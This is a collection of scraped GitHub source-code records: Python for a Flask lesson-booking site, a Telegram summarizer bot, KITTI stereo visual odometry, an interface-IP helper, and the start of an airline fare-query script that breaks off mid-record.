name_set = set()\n # self.rows maps names to row dicts, so iterate the dicts and read the name entry\n for row_dict in self.rows.values():\n name = row_dict['name_entry'].get()\n if name in name_set:\n messagebox.showerror(\"Duplicate names not allowed\", f\"Food named '{name}' exists more than once\")\n return True\n if name != \"\":\n name_set.add(name)\n return False\n\n def _delete_row(self, row_dict, pop):\n \"\"\"\n row_dict -> dictionary\n pop -> boolean\n Destroys row based on arg row_dict. If pop is True, pops the row from self.rows\"\"\"\n # saves name for later reference\n name = row_dict['name_entry'].get()\n\n # destroys all widgets in row\n for key in row_dict.keys():\n if key == 'cb_var':\n continue\n row_dict[key].destroy()\n\n # removes row from self.rows if pop\n if pop:\n self.rows.pop(name)\n \n\n\n def clear_sheet(self):\n \"\"\"Removes all cells/entries from the sheet and empties self.rows\"\"\"\n for row_dict in self.rows.values():\n self._delete_row(row_dict, False)\n\n self.rows = {}\n \n\n def reset(self):\n \"\"\"Removes all rows from the sheet, empties self.rows, and creates the sheet from scratch\"\"\"\n self.clear_sheet()\n self.draw_sheet()","repo_name":"cgregurich/PythonFoodApp2","sub_path":"viewfoodspage.py","file_name":"viewfoodspage.py","file_ext":"py","file_size_in_byte":10518,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
{"seq_id":"28594625774","text":"from flask import render_template, url_for, flash, redirect, request\nfrom lessonfinder import app, db, user_manager\nfrom lessonfinder.form import SearchForm, SignupForm, RegistrationForm, levels, \\\n UpdateUsernameForm, EditRegistrationForm\nfrom lessonfinder.models import User, Participant, Lesson\nfrom flask_user import current_user, login_required, roles_required\nfrom sqlalchemy import or_\n\n\n@app.route(\"/\")\n@app.route(\"/about\")\ndef about():\n return render_template('about.html', title='About')\n\n\n@app.route(\"/signup\", methods=['GET', 'POST'])\ndef signup():\n if current_user.is_authenticated and current_user.roles == 'user':\n return redirect(url_for('profile'))\n form = SignupForm()\n if form.validate_on_submit():\n user = User(active=True, fName=form.fName.data, lName=form.lName.data, email=form.email.data, birthday=form.birthday.data,\n username=form.username.data, 
password=user_manager.hash_password(form.password.data))\n db.session.add(user)\n db.session.commit()\n flash(f'Account created for {form.username.data}!', 'success')\n return redirect(url_for('user.login'))\n return render_template('signup_page.html', title='Sign Up', form=form)\n\n\n@app.route(\"/results\")\ndef search_results(results):\n return render_template('search_results.html', title='Results', results=results)\n\n\n@app.route(\"/search\", methods=['GET', 'POST'])\ndef search():\n form = SearchForm()\n level_choice = dict(levels).get(form.level.data)\n if form.validate_on_submit():\n results = Lesson.query.filter(or_(Lesson.location == form.location.data,\n Lesson.startDate == form.startDate.data,\n Lesson.startTime == form.startTime.data,\n Lesson.day == form.day.data,\n Lesson.level == level_choice))\n if len(results.all()) == 0:\n flash('Your search did not yield any results. Please try again.', 'danger')\n else:\n return search_results(results)\n return render_template('search_lessons.html', title='Search', form=form)\n\n\n@app.route('/register_yourself/', methods=['GET', 'POST'])\n@login_required\ndef register_yourself(lesson_id):\n lesson = Lesson.query.get_or_404(lesson_id)\n if lesson in current_user.lessons:\n flash(f'You are already registered for this lesson. Please search for another one.', 'danger')\n return redirect('/search')\n else:\n current_user.lessons.append(lesson)\n db.session.commit()\n flash(f'You have successfully registered!', 'success')\n return redirect('/profile')\n\n\n@app.route(\"/register/\", methods=['GET', 'POST'])\n@login_required\ndef register(lesson_id):\n form = RegistrationForm()\n lesson = Lesson.query.get_or_404(lesson_id)\n if form.validate_on_submit():\n dependents = current_user.dependents\n dependent = Participant(fName=form.fName.data, lName=form.lName.data, contactNum=form.contactNum.data,\n contactEmail=form.contactEmail.data)\n if not dependents:\n current_user.dependents.append(dependent)\n dependent.lessons.append(lesson)\n db.session.add(dependent)\n db.session.commit()\n flash(f'Your dependent has been registered!', 'success')\n return redirect(url_for('profile'))\n elif dependents:\n exists = False\n for dep in dependents:\n if dep.fName == dependent.fName and dep.lName == dependent.lName:\n exists = True\n existingDep = dep\n break\n if exists:\n if lesson in existingDep.lessons:\n flash(f'You\\'re dependent is already registered for this lesson. 
Please search for another one.', 'danger')\n                    return redirect('/search')\n                else:\n                    existingDep.lessons.append(lesson)\n                    db.session.commit()\n                    flash(f'Your dependent has been registered!', 'success')\n                    return redirect(url_for('profile'))\n            else:\n                current_user.dependents.append(dependent)\n                dependent.lessons.append(lesson)\n                db.session.add(dependent)\n                db.session.commit()\n                flash(f'Your dependent has been registered!', 'success')\n                return redirect(url_for('profile'))\n    return render_template('register.html', title='Register', form=form, lesson=lesson)\n\n\n@app.route(\"/unregister/<int:lesson_id>/delete\", methods=['POST'])\n@login_required\ndef unregister_user(lesson_id):\n    lesson = Lesson.query.get_or_404(lesson_id)\n    for user in lesson.selfParticipant:\n        if current_user.id == user.id:\n            lesson.selfParticipant.remove(user)\n            db.session.commit()\n            flash(f'You have successfully unregistered from ' + lesson.name, 'success')\n            break\n        else:\n            continue\n    return redirect(url_for('profile'))\n\n\n@app.route(\"/unregister_dep/<int:lesson_id>/delete/<int:dep_id>\", methods=['POST'])\n@login_required\ndef unregister_dep(lesson_id, dep_id):\n    lesson = Lesson.query.get_or_404(lesson_id)\n    dependent = Participant.query.get_or_404(dep_id)\n    dependent.lessons.remove(lesson)\n    db.session.commit()\n    return redirect(url_for('profile'))\n\n\n@app.route(\"/dep_lesson_info/<int:lesson_id>/<int:dep_id>\")\n@login_required\ndef dep_lesson_info(lesson_id, dep_id):\n    lesson = Lesson.query.get(lesson_id)\n    dependent = Participant.query.get(dep_id)\n    return render_template('dep_lesson_info.html', title=\"Information\", lesson=lesson, dependent=dependent)\n\n\n@app.route(\"/lesson_info/<int:lesson_id>\")\n@login_required\ndef lesson_info(lesson_id):\n    lesson = Lesson.query.get(lesson_id)\n    return render_template('lesson_info.html', title=\"Information\", lesson=lesson)\n\n\n@app.route(\"/profile\")\n@login_required\ndef profile():\n    if current_user.is_authenticated:\n        lessons = current_user.lessons\n        dependents = current_user.dependents\n        depLessons = []\n        for dependent in dependents:\n            for lesson in dependent.lessons:\n                depLessons.append(lesson)\n    return render_template('profile.html', title=\"Profile\",\n                           lessons=lessons, dependents=dependents, depLessons=depLessons)\n\n\n@app.route(\"/edit_registration/<int:dep_id>\", methods=['GET', 'POST'])\n@login_required\ndef edit_registration(dep_id):\n    form = EditRegistrationForm()\n    dep = Participant.query.get_or_404(dep_id)\n    if form.validate_on_submit():\n        update_registration_helper(form, dep)\n        flash(f'Registration updated successfully.', 'success')\n        return redirect(url_for('profile'))\n    return render_template('edit_registration.html', title=\"Edit\", form=form, dep=dep)\n\n\ndef update_registration_helper(form, dep):\n    if form.contactNum.data:\n        dep.contactNum = form.contactNum.data\n    if form.contactEmail.data:\n        dep.contactEmail = form.contactEmail.data\n    db.session.commit()\n\n\n@app.route('/update_username', methods=['GET', 'POST'])\n@login_required\ndef update_username():\n    form = UpdateUsernameForm()\n    user = current_user\n    if form.validate_on_submit():\n        user.username = form.username.data\n        db.session.commit()\n        flash(f'Username was successfully changed!', 'success')\n        return redirect(url_for('profile'))\n    return render_template('edit_username.html', title='Change Username', form=form)\n\n\n@app.route('/remove_dep/<int:dep_id>', methods=['POST'])\n@login_required\ndef remove_dep(dep_id):\n    dependent = Participant.query.get_or_404(dep_id)\n    db.session.delete(dependent)\n    db.session.commit()\n    flash(f'Dependent was successfully deleted.', 'success')\n    return 
redirect(url_for('profile'))\n","repo_name":"klark17/FlaskProject","sub_path":"lessonfinder/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":7955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5246805813","text":"import telegram\nimport recapper\nfrom telegram.ext import Updater, CommandHandler, MessageHandler, Filters\nimport logging\nimport re\n\n\ndef start(bot, update):\n    bot.send_message(chat_id=update.message.chat_id,\n                     text=\"I'm summarize.me, you send me url to an article you want to read, I send you a short \"\n                          \"recap, a good deal isn't it? \"\n                          \"\"\n                          \"If you want to know how i'm made, please visit https://github.com/Tsadoq/summarize.me\"\n                          \"To use me, send me a link to the article you want to have a recap and a number between 0 \"\n                          \"and 1 (e.g. 0.3) to have a shorter or longer summary\")\n\n\ndef startup(tkn):\n    updater = Updater(token=tkn)\n    dispatcher = updater.dispatcher\n    logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO)\n    print('starting up the bot')\n    return updater, dispatcher\n\n\ndef summarize(bot, update):\n    print('Article received')\n    chat_id = update.message.chat_id\n    text = update.message.text\n    [url, perc] = text.split(\" \")\n    if re.match(r'^-?\\d+(?:\\.\\d+)?$', perc) is None:\n        txt = \"The message has been sent with the wrong syntax, it should be in the form of \" \\\n              \"'www.example.com/somearticle 0.3' \"\n        bot.send_message(chat_id=update.message.chat_id, text=txt)\n    else:\n        txt = \"Article received, processing, this process could take up to 30 seconds\"\n        bot.send_message(chat_id=update.message.chat_id, text=txt)\n        r = recapper.Recapper(url)\n        r.process()\n        recap = r.summarize(perc=perc)\n        bot.send_message(chat_id=update.message.chat_id, text=f\"{r.article.title} - RECAP\\n\\n\",\n                         parse_mode=telegram.ParseMode.HTML)\n        bot.send_message(chat_id=update.message.chat_id, text=recap)\n        bot.send_message(chat_id=update.message.chat_id, text='\\n\\n The Hosting of the bot is quite expensive, if you could help me pay it that would be great :) ',parse_mode=telegram.ParseMode.HTML)\n        r.get_info()\n\n\n\ndef main():\n    tkn = open('token.txt', 'r').readline()\n    updater, dispatcher = startup(tkn)\n    start_handler = CommandHandler('start', start)\n    dispatcher.add_handler(MessageHandler(Filters.text, summarize))\n    dispatcher.add_handler(start_handler)\n    updater.start_polling()\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"Tsadoq/summarize.me","sub_path":"summarizeme.py","file_name":"summarizeme.py","file_ext":"py","file_size_in_byte":2628,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"41632695382","text":"import numpy as np\nimport cv2\n\nimport glob\nimport os\n\nimport time\nimport argparse\n\nfrom collections import defaultdict\nfrom scipy.optimize import least_squares\nfrom math import cos, sin\n\nL = 0\n\nR = 1\n\nIMSIZE = (1241, 376)\n\ndef getGt(txt):\n    \"\"\" \n    Parses calib.txt in Kitti dataset\n    \n    Parameters: \n    txt (string): path to calib.txt file\n    \n    Returns: \n    2 np arrays containing left and right Projective matrix\n    \"\"\"\n    with open(txt, 'r') as f:\n        lines = f.readlines()\n        for line in lines:\n            if 'P0' in line:\n                p0 = line.split(':')[1][1:]\n                p0 = p0.split(' ')\n                assert len(p0)==12\n                p0 = list(map(float, p0))\n            elif 'P1' in line:\n                p1 = line.split(':')[1][1:]\n                p1 = p1.split(' ')\n                assert len(p1)==12\n                p1 = list(map(float, p1))\n\n    return 
np.asarray(p0).reshape(3,4), np.asarray(p1).reshape(3,4)\n\n\n\ndef estDisparity(imgL,imgR,engine):\n    \"\"\" \n    Calculates disparity using left and right images, using an engine with prescribed parameters\n    \n    Parameters: \n    imgL : Left Image\n    imgR : Right Image\n    Engine : Disparity engine to be used\n    \n    Returns: \n    disparity map\n    \"\"\"\n    return np.divide(engine.compute(imgL,imgR).astype(np.float32),16.0)\n\n\ndef fastDetect(img1L,img2L,feature_detector = 0):\n    \"\"\" \n    Feature detection\n    \n    Parameters: \n    img1L : Left image of first frame\n    img2L : Left image of second frame\n    feature detector : 0 = FAST 1 = GFTT\n    \n    Returns: \n    matched features in left and right images\n    \"\"\"\n    H,W = img1L.shape\n    TILE_H = 10\n    TILE_W = 20\n    kp = []\n\n    if(feature_detector == 0):\n        featureEngine = cv2.FastFeatureDetector_create()\n        \n        for y in range(0, H, TILE_H):\n            for x in range(0, W, TILE_W):\n                imPatch = img1L[y:y+TILE_H, x:x+TILE_W]\n                keypoints = featureEngine.detect(imPatch)\n                for pt in keypoints:\n                    pt.pt = (pt.pt[0] + x, pt.pt[1] + y)\n                if (len(keypoints) > 10):\n                    keypoints = sorted(keypoints, key=lambda x: -x.response)\n                    for kpt in keypoints[0:10]:\n                        kp.append(kpt)\n                else:\n                    for kpt in keypoints:\n                        kp.append(kpt)\n\n    if(feature_detector == 1):\n        featureEngine = cv2.GFTTDetector_create(maxCorners=4000, minDistance=8.0, qualityLevel=0.001, useHarrisDetector=False)\n        keypoints = featureEngine.detect(img1L)\n        \n        for kpt in keypoints:\n            kp.append(kpt)\n\n\n    features1 = cv2.KeyPoint_convert(kp)\n    features1 = np.expand_dims(features1, axis=1)\n\n    # Parameters for lucas kanade optical flow\n    lk_params = dict( winSize  = (15,15),\n                      maxLevel = 3,\n                      criteria = (cv2.TERM_CRITERIA_EPS | cv2.TERM_CRITERIA_COUNT, 50, 0.03))\n\n    features2, st, err = cv2.calcOpticalFlowPyrLK(img1L, img2L, features1, None, flags=cv2.MOTION_AFFINE, **lk_params)\n\n    # separate points that were tracked successfully\n    ptTrackable = np.where(st == 1, 1,0).astype(bool)\n    features1_KLT = features1[ptTrackable, ...]\n    features2_KLT = features2[ptTrackable, ...]\n    features2_KLT = np.around(features2_KLT)\n\n    # among tracked points take points within error measure\n    error = 4\n    errTrackablePoints = err[ptTrackable, ...]\n    errThresholdedPoints = np.where(errTrackablePoints < error, 1, 0).astype(bool)\n    features1_KLT = features1_KLT[errThresholdedPoints, ...]\n    features2_KLT = features2_KLT[errThresholdedPoints, ...]\n\n\n    # check for validity of tracked point Coordinates\n    hPts = np.where(features2_KLT[:,1] >= H)\n    wPts = np.where(features2_KLT[:,0] >= W)\n    outTrackPts = hPts[0].tolist() + wPts[0].tolist()\n    outDeletePts = list(set(outTrackPts))\n\n    if len(outDeletePts) > 0:\n        features1_KLT_L = np.delete(features1_KLT, outDeletePts, axis=0)\n        features2_KLT_L = np.delete(features2_KLT, outDeletePts, axis=0)\n    else:\n        features1_KLT_L = features1_KLT\n        features2_KLT_L = features2_KLT\n\n    return features1_KLT_L,features2_KLT_L\n\ndef featureEliminator(img1_disparity,img2_disparity,kp1_matched,kp2_matched,disparityMinThres = 0.0, disparityMaxThres = 100.0):\n    \"\"\" \n    Calculates 3d positions of the keypoints and eliminates the illegal ones\n    \n    Parameters: \n    img1_disparity : disparity map for first stereo pair\n    img2_disparity : disparity map for second stereo pair\n    kp1_matched : matched features for 1st pair\n    kp2_matched : matched features for 2nd pair\n    disparityMinThres: Minimum disparity that is considered legal\n    disparityMaxThres: Maximum disparity that is considered legal\n    \n    Returns: \n    Legal features, and their positions on 
left and right images\n    \"\"\"\n    kps1L = kp1_matched\n    kps2L = kp2_matched\n\n    kps1R = np.copy(kp1_matched)\n    kps2R = np.copy(kp2_matched)\n\n    valPoints = np.zeros(kps1L.shape[0])\n\n    for i in range(kps1L.shape[0]):\n        disp1 = img1_disparity[int(kps1L[i,1]), int(kps1L[i,0])]\n        disp2 = img2_disparity[int(kps2L[i,1]), int(kps2L[i,0])]\n        \n        if (disp1 > disparityMinThres and disp1 < disparityMaxThres \n            and disp2 > disparityMinThres and disp2 < disparityMaxThres):\n            kps1R[i, 0] = kps1L[i, 0] - disp1\n            kps2R[i, 0] = kps2L[i, 0] - disp2\n            valPoints[i] = 1\n        \n    valPoints = valPoints.astype(bool)\n\n    return kps1L[valPoints, ...],kps1R[valPoints, ...],kps2L[valPoints, ...],kps2R[valPoints, ...]\n\ndef triangulate3D(features_L_3d,features_R_3d,numPoints,Proj1,Proj2):\n    \"\"\" \n    Triangulate the points\n    \n    Parameters: \n    features_L_3d : Features in Left image \n    features_R_3d : Features in Right Image\n    numPoints : Len of features\n    Proj1 : K[R|T] matrix of left camera\n    Proj2 : K[R|T] matrix of Right camera\n    \n    Returns: \n    3d points\n    \"\"\"\n\n    Features3d = np.ones((numPoints,3))\n\n    for i in range(numPoints):\n    #for i in range(1):\n        pLeft = features_L_3d[i,:]\n        pRight = features_R_3d[i,:]\n        \n        X = np.zeros((4,4))\n        X[0,:] = pLeft[0] * Proj1[2,:] - Proj1[0,:]\n        X[1,:] = pLeft[1] * Proj1[2,:] - Proj1[1,:]\n        X[2,:] = pRight[0] * Proj2[2,:] - Proj2[0,:]\n        X[3,:] = pRight[1] * Proj2[2,:] - Proj2[1,:]\n        \n        _,_,V = np.linalg.svd(X)\n\n        Features3d[i, :] = (V[-1]/V[-1,-1]).T[:-1]\n\n    return Features3d\n\n\ndef generateAdjMatrix(Features3d1,Features3d2,tolerance=0.2):\n    \"\"\" \n    Generates adjacency matrix for clique detection\n    \n    Parameters: \n    Features3d1 : Features in 1st Image\n    Features3d2 : Features in 2nd image\n    tolerance : allowed tolerance\n    \n    Returns: \n    Adjacency matrix \n    \"\"\"\n\n    numPoints = Features3d1.shape[0]\n    W = np.zeros((numPoints, numPoints))\n\n    # diff of pairwise euclidean distance between same points in T1 and T2\n    for i in range(numPoints):\n        for j in range(numPoints):\n            T2Dist = np.linalg.norm(Features3d2[i,:] - Features3d2[j,:])\n            T1Dist = np.linalg.norm(Features3d1[i,:] - Features3d1[j,:])\n            if (abs(T2Dist - T1Dist) < tolerance):\n                W[i, j] = 1\n\n    return W\n\ndef findMaxClique(W):\n    \"\"\" \n    Finds maximum clique\n    \n    Parameters: \n    W = Adjacency matrix\n    \n    Returns: \n    Points in maxclique using a greedy approach\n    \"\"\"\n    maxn = np.argmax(np.sum(W,axis = 1))\n    maxc = np.sum(W,axis = 1)[maxn]\n    clique = [maxn]\n    isin = True\n\n    numPoints = W.shape[0]\n    while True:\n        potentialnodes = list()\n        # Find potential nodes which are connected to all nodes in the clique\n        for i in range(numPoints):\n            for j in range(len(clique)):\n                isin = isin & bool(W[i, clique[j]])\n            if isin == True and i not in clique:\n                potentialnodes.append(i)\n            isin=True\n\n        count = 0\n        maxn = 0\n        maxc = 0\n        # Find the node which is connected to the maximum number of potential nodes and store in maxn\n        for i in range(len(potentialnodes)):\n            for j in range(len(potentialnodes)):\n                if W[potentialnodes[i], potentialnodes[j]] == 1:\n                    count = count+1\n            if count > maxc:\n                maxc = count\n                maxn = potentialnodes[i]\n            count = 0\n        if maxc == 0:\n            break\n        clique.append(maxn)\n        \n        if (len(clique) > 100):\n            break \n\n\n    return clique\n\n\n\ndef generateRotMat(psi, theta, sigma):\n    \"\"\" \n    generates Rotation matrix \n    \n    Parameters: \n    psi, theta, sigma, rotations about x,y,z, directions\n    \n    Returns: \n    Rotation matrix\n    \"\"\"\n    mat = np.zeros((3,3))\n    mat[0,0] = cos(psi) * cos(sigma) - sin(psi) * cos(theta) * sin(sigma)\n    
mat[0,1] = -cos(psi) * sin(sigma) - sin(psi) * cos(theta) * cos(sigma)\n    mat[0,2] = sin(psi) * sin(theta)\n    \n    mat[1,0] = sin(psi) * cos(sigma) + cos(psi) * cos(theta) * sin(sigma)\n    mat[1,1] = -sin(psi) * sin(sigma) + cos(psi) * cos(theta) * cos(sigma)\n    mat[1,2] = -cos(psi) * sin(theta)\n    \n    mat[2,0] = sin(theta) * sin(sigma)\n    mat[2,1] = sin(theta) * cos(sigma)\n    mat[2,2] = cos(theta)\n    \n    return mat\n\ndef loss(dof,d2dPoints1, d2dPoints2, d3dPoints1, d3dPoints2, w2cMatrix):\n    \"\"\" \n    generate cost for LM \n    \n    Parameters: \n    dof : optimizable parameters\n    d2dPoints1 : points in image 1 in 2d\n    d2dPoints2 : points in image 2 in 2d\n    d3dPoints1 : points in image 1 in 3d\n    d3dPoints2 : points in image 2 in 3d\n    w2cMatrix : Left projection matrix\n\n    Returns: \n    loss\n    \"\"\"\n    perspectiveProj = np.eye(4)\n    Rmat = generateRotMat(dof[0], dof[1], dof[2])\n    perspectiveProj[:3,:3] = Rmat\n    perspectiveProj[0,-1] = dof[3]\n    perspectiveProj[1,-1] = dof[4]\n    perspectiveProj[2,-1] = dof[5]\n\n    numPoints = d2dPoints1.shape[0]\n    errorA = np.zeros((numPoints,3))\n    errorB = np.zeros((numPoints,3))\n    \n    forwardProjection = np.matmul(w2cMatrix, perspectiveProj)\n    backwardProjection = np.matmul(w2cMatrix, np.linalg.inv(perspectiveProj))\n    for i in range(numPoints):\n        Ja = np.ones((3))\n        Jb = np.ones((3))\n        Wa = np.ones((4))\n        Wb = np.ones((4))\n        \n        Ja[0:2] = d2dPoints1[i,:]\n        Jb[0:2] = d2dPoints2[i,:]\n        Wa[0:3] = d3dPoints1[i,:]\n        Wb[0:3] = d3dPoints2[i,:]\n        \n        JaPred = np.matmul(forwardProjection, Wb)\n        JaPred /= JaPred[-1]\n        e1 = Ja - JaPred\n        \n        JbPred = np.matmul(backwardProjection, Wa)\n        JbPred /= JbPred[-1]\n        e2 = Jb - JbPred\n        \n        errorA[i,:] = e1\n        errorB[i,:] = e2\n        \n    residual = np.vstack((errorA,errorB))\n    return residual.flatten()\n\n\n\n\n\ndef estimateOdometry(img1,img2,Proj1,Proj2,img1_disparity,img2_disparity,feature_detector):\n\n    \"\"\" \n    main code, which is to be called every loop \n    \n    Parameters: \n    img1 : first pair\n    img2 : 2nd pair\n    Proj1 : Projection for left cam\n    Proj2 : Projection for right cam\n    img1_disparity : disparity for 1st frame\n    img2_disparity : disparity for 2nd frame\n    feature_detector : 0 = FAST, 1 = GFTT\n\n    Returns: \n    6d pose, cost\n    \"\"\"\n\n    #Feature detection\n\n    features_1L,features_2L = fastDetect(img1[L],img2[L],feature_detector)\n\n    features_1L_3d,features_1R_3d,features_2L_3d,features_2R_3d = featureEliminator(img1_disparity,img2_disparity,features_1L,features_2L)\n\n\n    # 3d triangulation\n    numPoints = features_1L_3d.shape[0]\n    Points3d1 = triangulate3D(features_1L_3d,features_1R_3d,numPoints,Proj1,Proj2)\n    Points3d2 = triangulate3D(features_2L_3d,features_2R_3d,numPoints,Proj1,Proj2)\n\n    # Eliminate outliers\n\n    tol = 0.2\n    len_clique = 0\n    clique = []\n    while len_clique < 6 and Points3d1.shape[0] >= 6:\n        # in-lier detection algorithm\n        W = generateAdjMatrix(Points3d1,Points3d2,tol)\n        clique = findMaxClique(W)\n        len_clique = len(clique)\n        tol *= 2\n\n    \n    # pick up clique point 3D coords and features for optimization\n    PointsClique3d1 = Points3d1[clique]\n    PointsClique3d2 = Points3d2[clique]\n\n    # points = features\n    features_1L_3d = features_1L_3d[clique]\n    features_2L_3d = features_2L_3d[clique]\n\n\n\n    if (features_1L_3d.shape[0] >= 6):\n        dSeed = np.zeros(6)\n\n        optRes = least_squares(loss, dSeed, method='lm', max_nfev=2000,\n                               args=(features_1L_3d, features_2L_3d, PointsClique3d1, PointsClique3d2, Proj1))\n\n        \n        error = optRes.fun\n        pointsInClique = len(clique)\n        e = error.reshape((pointsInClique*2, 3))\n        errorThreshold = 0.5\n        xRes1 = 
np.where(e[0:pointsInClique, 0] >= errorThreshold)\n yRes1 = np.where(e[0:pointsInClique, 1] >= errorThreshold)\n zRes1 = np.where(e[0:pointsInClique, 2] >= errorThreshold)\n xRes2 = np.where(e[pointsInClique:2*pointsInClique, 0] >= errorThreshold)\n yRes2 = np.where(e[pointsInClique:2*pointsInClique, 1] >= errorThreshold)\n zRes2 = np.where(e[pointsInClique:2*pointsInClique, 2] >= errorThreshold)\n\n pruneIdx = xRes1[0].tolist() + yRes1[0].tolist() + zRes1[0].tolist() + (xRes2[0] - pointsInClique).tolist() + (yRes2[0] - pointsInClique).tolist() + (zRes2[0] - pointsInClique).tolist()\n if (len(pruneIdx) > 0):\n uPruneIdx = list(set(pruneIdx))\n features_1L_3d = np.delete(features_1L_3d, uPruneIdx, axis=0)\n features_2L_3d = np.delete(features_2L_3d, uPruneIdx, axis=0)\n PointsClique3d1 = np.delete(PointsClique3d1, uPruneIdx, axis=0)\n PointsClique3d2 = np.delete(PointsClique3d2, uPruneIdx, axis=0)\n \n if (features_1L_3d.shape[0] >= 6):\n optRes = least_squares(loss, optRes.x, method='lm', max_nfev=2000,\n args=(features_1L_3d, features_2L_3d, PointsClique3d1, PointsClique3d2, Proj1))\n \n\n return optRes.x, optRes.cost\n\n return [0,0,0,0,0,0],0\n\n\n\nif __name__=='__main__':\n\n\n \n parser = argparse.ArgumentParser()\n parser.add_argument(\"-s\", \"--seqPath\",required = True,type = str,help='path to kitti sequence directory, for example, ./svo/dataset/sequences/00/')\n parser.add_argument(\"-f\", \"--feature\",default = 'FAST',type = str,choices = ['GFTT','FAST'],help='which feature detector is to be used?')\n parser.add_argument(\"-r\", \"--resultsPath\",required = True,type = str,help='path to file where results are to be stored in kitti format, for example ./results/00.txt')\n args = parser.parse_args()\n \n seq = (args.seqPath)\n feat = args.feature\n\n if(feat == 'GFTT'):\n feat = 1\n else:\n feat = 0\n\n\n start = time.time()\n \n \n PATH = args.seqPath\n\n \n try:\n P0L, P0R = getGt(PATH + 'calib.txt')\n except:\n print(\"CALIB FILE NOT FOUND\")\n exit(1)\n\n \n \n assert (P0L[:,-1]==np.zeros(3)).all() == 1 # first camera translation is zero\n #K = P0L[:,:-1]\n\n curr_transX = 0.0\n curr_transZ = 0.0\n\n f = open(args.resultsPath,\"w\")\n\n RmatGlobal = np.eye(3)\n\n transGlobal = np.zeros(3)\n \n l = len(glob.glob(PATH + \"image_0/*\"))\n print(\"Number of images detected : \",l)\n if(l==0):\n print(\"NO IMAGES FOUND AT \",os.path.join(PATH,\"image_0\"))\n exit(1)\n\n disparityEngine = cv2.StereoSGBM_create(minDisparity = 0,numDisparities=32, blockSize=11,P1= 121*8, P2 = 121*32)\n\n\n for i in range(1,l):\n path1L = PATH + \"image_0/\" + str(i-1).zfill(6) + \".png\"\n path1R = PATH + \"image_1/\" + str(i-1).zfill(6) + \".png\"\n path2L = PATH + \"image_0/\" + str(i).zfill(6) + \".png\"\n path2R = PATH + \"image_1/\" + str(i).zfill(6) + \".png\"\n\n\n if(i==1):\n imageLeft1 = cv2.imread(path1L, 0) \n imageRight1 = cv2.imread(path1R, 0)\n img1_disparity = estDisparity(imageLeft1,imageRight1,disparityEngine)\n else:\n imageLeft1 =imageLeft2\n imageRight1 =imageRight2\n img1_disparity = img2_disparity\n\n imageLeft2 = cv2.imread(path2L, 0)\n imageRight2 = cv2.imread(path2R, 0)\n img2_disparity = estDisparity(imageLeft2,imageRight2,disparityEngine)\n\n dofs, cost = estimateOdometry([imageLeft1,imageRight1],[imageLeft2,imageRight2],P0L,P0R,img1_disparity,img2_disparity,feat)\n\n\n transLocal = np.array([dofs[3],dofs[4],dofs[5]])\n RmatLocal = generateRotMat(dofs[0],dofs[1],dofs[2])\n\n transGlobal += RmatGlobal@transLocal\n\n RmatGlobal = RmatLocal@RmatGlobal\n\n print(\"I : \",i)\n 
#print(\"X : \",transGlobal[0],\" Y : \", transGlobal[1], \" Z : \", transGlobal[2])\n f.write(\n str(RmatGlobal[0,0]) + \" \" + str(RmatGlobal[0,1]) + \" \" + str(RmatGlobal[0,2]) + \" \" + str(transGlobal[0]) + \" \" \n + str(RmatGlobal[1,0]) + \" \" + str(RmatGlobal[1,1]) + \" \" + str(RmatGlobal[1,2]) + \" \" + str(transGlobal[1]) + \" \" \n + str(RmatGlobal[2,0]) + \" \" + str(RmatGlobal[2,1]) + \" \" + str(RmatGlobal[2,2]) + \" \" + str(transGlobal[2]) + \"\\n\")\n\n f.close()\n end = time.time()\n print(\"Time Per frame = \",(end - start)/l)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"AnandGokhale/CS6790_Project","sub_path":"rt-svo/svo.py","file_name":"svo.py","file_ext":"py","file_size_in_byte":17401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"301074032","text":"# Using code from https://stackoverflow.com/questions/6243276/how-to-get-the-physical-interface-ip-address-from-an-interface\n# By Bruno Romano\n# Modified to include try statement and use variable\nimport socket\nimport fcntl\nimport struct\n\ndef get_ip_address(ifname):\n try:\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n IP = socket.inet_ntoa(fcntl.ioctl(\n s.fileno(),\n 0x8915, # SIOCGIFADDR\n struct.pack('256s', ifname[:15].encode('utf8'))\n )[20:24])\n except Exception:\n IP = 'error'\n finally:\n return IP\n\nprint(get_ip_address('tun0'))\n","repo_name":"Mind-Surfer/openvpn-qbittorrent","sub_path":"run/getvpnip.py","file_name":"getvpnip.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71647045586","text":"# 查询票价接口2\n# 只可获取一天的最低票价,好处是不需要cookie\nfrom datetime import datetime, timedelta\nimport requests\nfrom constant import *\nfrom time import time\nimport queue\nimport threading\n\nheaders = {\n 'authority': 'm.csair.com',\n 'accept': '*/*',\n 'accept-language': 'zh-CN,zh;q=0.9',\n 'cache-control': 'no-cache',\n 'content-type': 'application/json; charset=UTF-8',\n 'origin': 'https://m.csair.com',\n 'referer': 'https://m.csair.com/booking_new/',\n 'user-agent': 'Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36',\n}\n\nparams = {\n 'type': 'MOBILE',\n 'APPTYPE': 'touch',\n 'chanel': 'touch',\n 'lang': 'zh',\n # 获取时间戳并转换为字符串\n '_': str(datetime.now().timestamp()).replace('.', '')[:13],\n # 从时间戳转换为datetime对象,再转换为字符串 #datetime.fromtimestamp(datetime.now().timestamp()).strftime('%Y-%m-%d %H:%M:%S')\n 'timeZone': 'GMT+08:00',\n 'osversion': 'Mozilla-5.0_AppleWebKit-537.36_Chrome-114.0.0.0_Mobile_Safari-537.36',\n}\n\n\n# json_data = {\n# 'depCity': 'TYN',\n# 'arrCity': 'CAN',\n# 'depCityFlag': True,\n# 'arrCityFlag': True,\n# 'newGroupBuyId': 'CSAIRXST02',\n# 'segType': 'S',\n# 'isInter': 'N',\n# 